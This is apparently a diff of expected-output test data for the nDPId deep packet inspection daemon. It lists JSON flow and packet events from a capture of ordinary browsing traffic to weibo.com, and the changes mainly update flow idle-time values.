+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1463089071008,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089071008,"pkt":"kDVu60UQeJKcD6iOCABFAAA8ct5AAEAGQqTAqAFpcoZQoubxAFC2vHVvAAAAAKACchA1VgAAAgQFtAQCCAoAQQexAAAAAAEDAwc="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071046,"flow_last_seen":1463089071046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089071046,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.206","src_port":35154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1463089071046,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071046,"pkt":"kDVu60UQeJKcD6iOCABFAAA0aeJAAEAGY8fAqAFp2DrSzolSAbv6shUXRZgnfoAQAcBJAQAAAQEICgBBB7tvXD+b"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1463089071094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071094,"pkt":"eJKcD6iOkDVu60UQCABFAAA0QjAAADYG1XnYOtLOwKgBaQG7iVJFmCd++rIVGIAQCVwVnQAAAQEICm9c76IAQIN7"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1463089071195,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071195,"pkt":"eJKcD6iOkDVu60UQCABFAAA0BcYAACkGBsVyhlCiwKgBaQBQ5u8JOZF4vUUCE4ASOQhvgQAAAgQFqAEBBAIBAwMH"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1463089071195,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071195,"pkt":"kDVu60UQeJKcD6iOCABFAAAoBZZAAEAGsADAqAFpcoZQoubvAFC9RQITCTmReVAQAOXoagAA"} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089070841,"flow_last_seen":1463089071196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1463089071196,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"weibo.com","url":"weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1463089071198,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071198,"pkt":"eJKcD6iOkDVu60UQCABFAAA0IcQAACoG6cZyhlCiwKgBaQBQ5vAZ6VqE6wTXzYASOQiSSgAAAgQFqAEBBAIBAwMH"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1463089071198,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071198,"pkt":"kDVu60UQeJKcD6iOCABFAAAo0ExAAEAG5UnAqAFpcoZQoubwAFDrBNfNGelahVAQAOULNAAA"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1463089071348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071348,"pkt":"eJKcD6iOkDVu60UQCABFAAA0BccAACoGBcRyhlCiwKgBaQBQ5vFPiVnutrx1cIASOQjz5AAAAgQFqAEBBAIBAwMH"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1463089071348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071348,"pkt":"kDVu60UQeJKcD6iOCABFAAAoct9AAEAGQrfAqAFpcoZQoubxAFC2vHVwT4lZ71AQAOVszgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071551,"flow_last_seen":1463089071551,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1463089071551,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1463089071551,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1463089071551,"pkt":"kDVu60UQeJKcD6iOCABFAAA7Jz9AAEARj7jAqAFpwKgBARvsADUAJ8YJ26oBAAABAAAAAAAAA3d3dwV3ZWlibwNjb20AAAEAAQ=="} 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071551,"flow_last_seen":1463089071551,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1463089071551,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"www.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1463089071612,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1463089071612,"pkt":"eJKcD6iOkDVu60UQCABFAACAAABAAEARtrLAqAEBwKgBaQA1G+wAbIVL26qBgAABAAMAAAAAA3d3dwV3ZWlibwNjb20AAAEAAcAMAAUAAQAAACUAGQN3d3cFd2VpYm8DY29tBWNkbmdjA25ldADAKwABAAEAAAAHAARdvIaJwCsAAQABAAAABwAEXbyGhw=="} 00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":42,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071551,"flow_last_seen":1463089071612,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1463089071612,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"www.weibo.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.137"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071613,"flow_last_seen":1463089071613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089071613,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1463089071613,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089071613,"pkt":"kDVu60UQeJKcD6iOCABFAAA84VFAAEAGsxPAqAFpXbyGicnyAFB0WekZAAAAAKACchD\/WQAAAgQFtAQCCAoAQQhIAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1463089071642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089071642,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGnGVdvIaJwKgBaQBQyfKlqmMtdFnpGqAS\/\/8RHAAAAgQFqAQCCAr5u121AEEISAEDAwc="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1463089071642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071642,"pkt":"kDVu60UQeJKcD6iOCABFAAA04VJAAEAGsxrAqAFpXbyGicnyAFB0WekapapjLoAQAOU+7wAAAQEICgBBCFD5u121"} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089071613,"flow_last_seen":1463089071642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1463089071642,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071730,"flow_last_seen":1463089071730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089071730,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1463089071730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071730,"pkt":"kDVu60UQeJKcD6iOCABFAAA08m9AAEAG2cLAqAFp2DrURZOqAbsjKGR2xs8noYAQA+RthAAAAQEICgBBCGYlk10U"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1463089071755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071755,"pkt":"eJKcD6iOkDVu60UQCABFAAA0StsAADYGy1fYOtRFwKgBaQG7k6rGzyehIyhkd4AQAsDqzAAAAQEICiWUDPAAQNxk"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071994,"flow_last_seen":1463089071994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089071994,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1463089071994,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071994,"pkt":"kDVu60UQeJKcD6iOCABFAAA06TdAAEAGtMfAqAFpNuGj0p34AbsDr1KJWj28A4AQAWjCCQAAAQEICgBBCKgBIwBO"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072046,"flow_last_seen":1463089072046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089072046,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1463089072046,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072046,"pkt":"kDVu60UQeJKcD6iOCABFAAA0dEpAAEAGV+zAqAFp2DrUQYeLAbv4qaw1BowayYAQAO03NAAAAQEICgBBCLUlGFKF"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1463089072070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072070,"pkt":"eJKcD6iOkDVu60UQCABFAAA0NhEAADYG4CXYOtRBwKgBaQG7h4sGjBrJ+KmsNoAQAV6y1gAAAQEICiUZAmMAQNzC"} -00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1463089071613,"flow_last_seen":1463089072125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":455,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089072125,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1463089072138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072138,"pkt":"eJKcD6iOkDVu60UQCABFAAA0XohAABsGZHc24aPSwKgBaQG7nfhaPbwDA69SioAQAIjCywAAAQEICgEjLGEAQNyy"} -00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":83,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1463089071613,"flow_last_seen":1463089072285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":12516,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1463089072285,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071613,"flow_last_seen":1463089071613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089071613,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1463089071613,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089071613,"pkt":"kDVu60UQeJKcD6iOCABFAAA84VFAAEAGsxPAqAFpXbyGicnyAFB0WekZAAAAAKACchD\/WQAAAgQFtAQCCAoAQQhIAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1463089071642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089071642,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGnGVdvIaJwKgBaQBQyfKlqmMtdFnpGqAS\/\/8RHAAAAgQFqAQCCAr5u121AEEISAEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1463089071642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071642,"pkt":"kDVu60UQeJKcD6iOCABFAAA04VJAAEAGsxrAqAFpXbyGicnyAFB0WekapapjLoAQAOU+7wAAAQEICgBBCFD5u121"} +00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089071613,"flow_last_seen":1463089071642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1463089071642,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071730,"flow_last_seen":1463089071730,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089071730,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1463089071730,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071730,"pkt":"kDVu60UQeJKcD6iOCABFAAA08m9AAEAG2cLAqAFp2DrURZOqAbsjKGR2xs8noYAQA+RthAAAAQEICgBBCGYlk10U"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1463089071755,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071755,"pkt":"eJKcD6iOkDVu60UQCABFAAA0StsAADYGy1fYOtRFwKgBaQG7k6rGzyehIyhkd4AQAsDqzAAAAQEICiWUDPAAQNxk"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071994,"flow_last_seen":1463089071994,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089071994,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1463089071994,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071994,"pkt":"kDVu60UQeJKcD6iOCABFAAA06TdAAEAGtMfAqAFpNuGj0p34AbsDr1KJWj28A4AQAWjCCQAAAQEICgBBCKgBIwBO"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072046,"flow_last_seen":1463089072046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089072046,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1463089072046,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072046,"pkt":"kDVu60UQeJKcD6iOCABFAAA0dEpAAEAGV+zAqAFp2DrUQYeLAbv4qaw1BowayYAQAO03NAAAAQEICgBBCLUlGFKF"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1463089072070,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072070,"pkt":"eJKcD6iOkDVu60UQCABFAAA0NhEAADYG4CXYOtRBwKgBaQG7h4sGjBrJ+KmsNoAQAV6y1gAAAQEICiUZAmMAQNzC"} 